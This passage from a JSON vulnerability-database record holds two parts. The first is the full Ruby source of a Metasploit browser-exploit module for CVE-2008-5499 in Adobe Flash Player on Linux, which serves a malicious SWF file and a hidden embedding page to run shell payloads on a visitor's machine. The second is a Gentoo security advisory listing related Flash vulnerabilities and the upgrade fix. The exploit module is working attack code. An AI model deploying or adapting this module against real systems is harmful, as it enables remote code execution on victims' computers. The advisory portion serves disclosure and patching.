"##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',\n 'Description' => %q{\n This module exploits a vulnerability in Adobe Flash Player for Linux,\n version 10.0.12.36 and 9.0.151.0 and prior.\n An input validation vulnerability allows command execution when the browser\n loads a SWF file which contains shell metacharacters in the arguments to\n the ActionScript launch method.\n\n The victim must have Adobe AIR installed for the exploit to work. This module\n was tested against version 10.0.12.36 (10r12_36).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version\n ],\n 'References' =>\n [\n ['CVE', '2008-5499'],\n ['OSVDB', '50796'],\n ['BID', '32896'],\n ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html']\n ],\n 'DefaultOptions' =>\n {\n 'HTTP::compression' => 'gzip',\n 'HTTP::chunked' => true\n },\n 'Platform' => 'unix', # so unix cmd exec payloads are ok\n 'Arch' => ARCH_CMD,\n 'Targets' =>\n [\n [ 'Automatic', {}],\n ],\n 'DisclosureDate' => 'Dec 17 2008',\n 'DefaultTarget' => 0))\n\n end\n\n def exploit\n path = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2008-5499.swf\" )\n fd = File.open( path, \"rb\" )\n @swf = fd.read(fd.stat.size)\n fd.close\n\n super\n end\n\n def on_request_uri(cli, request)\n msg = \"#{cli.peerhost.ljust(16)} #{self.shortname}\"\n trigger = @swf\n trigger_file = rand_text_alpha(rand(6)+3) + \".swf\"\n\n obj_id = rand_text_alpha(rand(6)+3)\n\n if request.uri.match(/\\.swf/i)\n print_status(\"#{msg} Sending Exploit SWF\")\n send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })\n return\n end\n\n if request.uri.match(/\\.txt/i)\n send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })\n return\n end\n\n html = <<-EOS\n <html>\n <head>\n </head>\n <body>\n <center>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" id=\"#{obj_id}\" width=\"1\" height=\"1\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\">\n <param name=\"movie\" value=\"#{get_resource}#{trigger_file}\" />\n <embed src=\"#{get_resource}#{trigger_file}\" quality=\"high\" width=\"1\" height=\"1\" name=\"#{obj_id}\" align=\"middle\" allowNetworking=\"all\"\n type=\"application/x-shockwave-flash\"\n pluginspage=\"http://www.macromedia.com/go/getflashplayer\">\n </embed>\n\n </object>\n </center>\n\n </body>\n </html>\n EOS\n\n print_status(\"#{msg} Sending HTML...\")\n send_response(cli, html, { 'Content-Type' => 'text/html' })\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb"}], "gentoo": [{"lastseen": "2016-09-06T19:46:35", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5362", "CVE-2009-0114", "CVE-2008-5361", "CVE-2009-0520", "CVE-2008-4824", "CVE-2008-5499", "CVE-2008-3873", "CVE-2008-5363", "CVE-2008-4823", "CVE-2008-4822", "CVE-2008-4818", "CVE-2008-4819", "CVE-2009-0519", "CVE-2008-4401", "CVE-2008-4503", "CVE-2009-0521", "CVE-2008-4821"], "edition": 1, "description": "### Background\n\nThe Adobe Flash Player is a renderer for the popular SWF file format, which is commonly used to provide interactive websites, digital experiences and mobile content. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player: \n\n * The access scope of SystemsetClipboard() allows ActionScript programs to execute the method without user interaction (CVE-2008-3873).\n * The access scope of FileReference.browse() and FileReference.download() allows ActionScript programs to execute the methods without user interaction (CVE-2008-4401).\n * The Settings Manager controls can be disguised as normal graphical elements. This so-called \"clickjacking\" vulnerability was disclosed by Robert Hansen of SecTheory, Jeremiah Grossman of WhiteHat Security, Eduardo Vela, Matthew Mastracci of DotSpots, and Liu Die Yu of TopsecTianRongXin (CVE-2008-4503).\n * Adan Barth (UC Berkely) and Collin Jackson (Stanford University) discovered a flaw occurring when interpreting HTTP response headers (CVE-2008-4818).\n * Nathan McFeters and Rob Carter of Ernst and Young's Advanced Security Center are credited for finding an unspecified vulnerability facilitating DNS rebinding attacks (CVE-2008-4819).\n * When used in a Mozilla browser, Adobe Flash Player does not properly interpret jar: URLs, according to a report by Gregory Fleischer of pseudo-flaw.net (CVE-2008-4821).\n * Alex \"kuza55\" K. reported that Adobe Flash Player does not properly interpret policy files (CVE-2008-4822).\n * The vendor credits Stefano Di Paola of Minded Security for reporting that an ActionScript attribute is not interpreted properly (CVE-2008-4823).\n * Riley Hassell and Josh Zelonis of iSEC Partners reported multiple input validation errors (CVE-2008-4824).\n * The aforementioned researchers also reported that ActionScript 2 does not verify a member element's size when performing several known and other unspecified actions, that DefineConstantPool accepts an untrusted input value for a \"constant count\" and that character elements are not validated when retrieved from a data structure, possibly resulting in a null-pointer dereference (CVE-2008-5361, CVE-2008-5362, CVE-2008-5363).\n * The vendor reported an unspecified arbitrary code execution vulnerability (CVE-2008-5499).\n * Liu Die Yu of TopsecTianRongXin reported an unspecified flaw in the Settings Manager related to \"clickjacking\" (CVE-2009-0114).\n * The vendor credits Roee Hay from IBM Rational Application Security for reporting an input validation error when processing SWF files (CVE-2009-0519).\n * Javier Vicente Vallejo reported via the iDefense VCP that Adobe Flash does not remove object references properly, leading to a freed memory dereference (CVE-2009-0520).\n * Josh Bressers of Red Hat and Tavis Ormandy of the Google Security Team reported an untrusted search path vulnerability (CVE-2009-0521).\n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted SWF file, possibly resulting in the execution of arbitrary code with the privileges of the user or a Denial of Service (crash). Furthermore a remote attacker could gain access to sensitive information, disclose memory contents by enticing a user to open a specially crafted PDF file inside a Flash application, modify the victim's clipboard or render it temporarily unusable, persuade a user into uploading or downloading files, bypass security restrictions with the assistance of the user to gain access to camera and microphone, conduct Cross-Site Scripting and HTTP Header Splitting attacks, bypass the \"non-root domain policy\" of Flash, and gain escalated privileges. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-plugins/adobe-flash-10.0.22.87\"", "modified": "2009-05-28T00:00:00", "published": "2009-03-10T00:00:00", "id": "GLSA-200903-23", "href": "https://security.gentoo.org/glsa/200903-23", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
